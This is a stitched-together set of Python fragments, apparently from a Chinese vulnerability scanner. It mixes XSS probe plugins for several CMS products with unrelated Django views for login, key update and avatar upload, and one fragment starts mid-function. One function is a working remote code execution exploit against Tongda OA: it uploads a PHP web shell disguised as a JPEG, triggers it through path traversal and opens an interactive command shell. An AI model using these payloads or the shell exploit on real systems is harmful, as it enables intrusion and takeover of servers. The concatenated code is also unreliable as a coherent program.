Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
web=VulnerabilityDetails(_t.info)
web.Low() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
rm = randoms().result(20)
payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(
rm)
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find("<script>alert({})</script>".format(rm)) != -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def GenerateProject(request):#用来生成项目,并且生成文件和用户绑定
RequestLogRecord(request, request_api="create_cross_site_script_project")
if request.method == "POST":
try:
JavaScriptFileData = json.loads(request.body)["javascript_data"]#获取前端传入的加密过的js文件数据
ProjectName = json.loads(request.body)["project_name"]#项目名
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None and JavaScriptFileData!=None: # 查到了UID,并且js数据不为空
UserOperationLogRecord(request, request_api="create_cross_site_script_project", uid=Uid)
GetJavaScriptFilePath().Result()#获取js文件路径
while True:#如果查询确实冲突了
JavaScriptSaveFileName=randoms().result(5)#文件名
QueryJavaScriptSaveFileNameValidity = CrossSiteScriptProject().RepeatInvestigation(file_name=JavaScriptSaveFileName)#判断文件是否重复
if not QueryJavaScriptSaveFileNameValidity:#如果不冲突的话跳出循环
break
JavaScriptSaveRoute = GetJavaScriptFilePath().Result() + JavaScriptSaveFileName # 获得保存路径
with open(JavaScriptSaveRoute, 'wb') as f:
f.write(base64.b64decode(str(JavaScriptFileData).encode('utf-8')))#文件内容还要加密
CrossSiteScriptProject().Write(file_name=JavaScriptSaveFileName,uid=Uid,project_name=ProjectName)#写到数据库表中
return JsonResponse({'message': "欧拉欧拉欧拉欧拉欧拉欧拉欧拉欧拉(๑•̀ㅂ•́)و✧", 'code': 200, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_GenerateProject(def)", e)
return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=randoms().result(20)
payload = "/demo.php?time=alert('{}')".format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find("time:alert('{}'),".format(RD)) != -1 :
Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(20)
payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
if con.find("<script>confirm({})</script>".format(rm)) != -1:
Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def command(url):
cmd_rm=randoms().result(10)
url1 = url + '/ispirit/im/upload.php'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['%s'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"%(cmd_rm,cmd_rm)
result = requests.post(url1, headers=headers, data=data,proxies={'http':'127.0.0.1:8080'})
name = "".join(re.findall("2003_(.+?)\|", result.text))
url2 = url + '/ispirit/interface/gateway.php'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"}
while(1):
command = input("fuhei@shell$ ")
if command == 'exit' or command == 'quit':
break
else:
data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" % (name,cmd_rm), "%s"%cmd_rm: "%s" %command}
result = requests.post(url2, headers=headers, data=data,proxies={'http':'127.0.0.1:8080'})
print(result.text)
def UpdateKey(request): #更新Key
RequestLogRecord(request, request_api="update_key")
if request.method == "POST":
try:
Token = json.loads(request.body)["token"]
NewKey = randoms().result(40) #生成随机的key,有可能会重复,这边先暂时不管了,这概论太j8低了
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request,
request_api="update_key",
uid=Uid) # 查询到了在计入
UpdateKeyResult = UserInfo().UpdateKey(uid=Uid,
key=NewKey) #获取值查看是否成功
if UpdateKeyResult:
return JsonResponse({
'message': '呐呐呐呐!修改成功了呢~',
'code': 200,
})
else:
return JsonResponse({
'message': "输入信息有误重新输入",
'code': 404,
})
else:
return JsonResponse({
'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e)
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def Login(request):#用户登录,每次登录成功都会刷新一次Token
RequestLogRecord(request, request_api="login")
if request.method == "POST":
try:
Username=json.loads(request.body)["username"]
Passwd=json.loads(request.body)["passwd"]
VerificationCodeKey = json.loads(request.body)["verification_code_key"]#获取验证码关联的KEY
Code = json.loads(request.body)["verification_code"].lower()#获取验证码,把验证码全部转换成小写
Md5Passwd=Md5Encryption().Md5Result(Passwd)#对密码加密
if VerificationCodeKey!=None and Code!=None:#判断传入数据不为空
VerificationCodeResult=VerificationCode().Query(code=Code,verification_code_key=VerificationCodeKey)#获取判断
if VerificationCodeResult:#如果为真,进行登录验证
UserLogin=UserInfo().UserLogin(Username,Md5Passwd)
if UserLogin is None:
return JsonResponse({'message': '账号或密码错误', 'code': 604, })
else:
while True:#如果查询确实冲突了
Token = randoms().result(250)
QueryTokenValidity = UserInfo().QueryTokenValidity(Token)#用来查询Token是否冲突了
if not QueryTokenValidity:#如果不冲突的话跳出循环
break
UpdateToken=UserInfo().UpdateToken(name=Username, token=Token)#接着更新Token
if UpdateToken:#如果更新成功了
Uid = UserInfo().QueryUidWithToken(Token) # 查询UID
UserOperationLogRecord(request, request_api="login", uid=Uid)
return JsonResponse({'message': Token, 'code': 200, })
else:
return JsonResponse({'message': "验证码错误或者过期!", 'code': 503, })
else:
return JsonResponse({'message': "验证码或者验证码秘钥不能为空!", 'code': 504, })
except Exception as e:
ErrorLog().Write("Web_BasicFunctions_User_LogIn(def)", e)
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def UploadAvatar(request):#文件上传功能
RequestLogRecord(request, request_api="upload_avatar")
Token =request.headers["token"]
if request.method == "POST":
try:
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="upload_avatar", uid=Uid) # 查询到了在计入
PictureData = request.FILES.get('file', None)#获取文件数据
if 10240<PictureData.size:#最大值10MB,最小值10KB
SaveFileName=randoms().result(10)+str(int(time.time()))+".jpg"#重命名文件
SaveRoute=GetImageFilePath().Result()+SaveFileName#获得保存路径
with open(SaveRoute, 'wb') as f:
for line in PictureData:
f.write(line)
UserInfo().UpdateAvatar(avatar=SaveFileName,uid=Uid)#图片写到本地后更新用户头像
return JsonResponse({'message': SaveFileName, 'code': 200,})#返回上传图片名称
else:
return JsonResponse({'message': '它实在是太小了,莎酱真的一点感觉都没有o(TヘTo)', 'code': 603,})
else:
return JsonResponse({'message': '宝贝没有用户你要插到哪里去呢?', 'code': 404, })
except Exception as e:
ErrorLog().Write("Web_Api_User_UploadAvatar(def)", e)
return JsonResponse({'message': '你不对劲!为什么报错了?', 'code': 169,})
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = '/mobile/user.php?act=act_register'
payload_url = scheme + "://" + url +":"+ str(port) + payload
data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(rm)
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url, data=data, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("<script>alert({})</script>".format(rm))!= -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
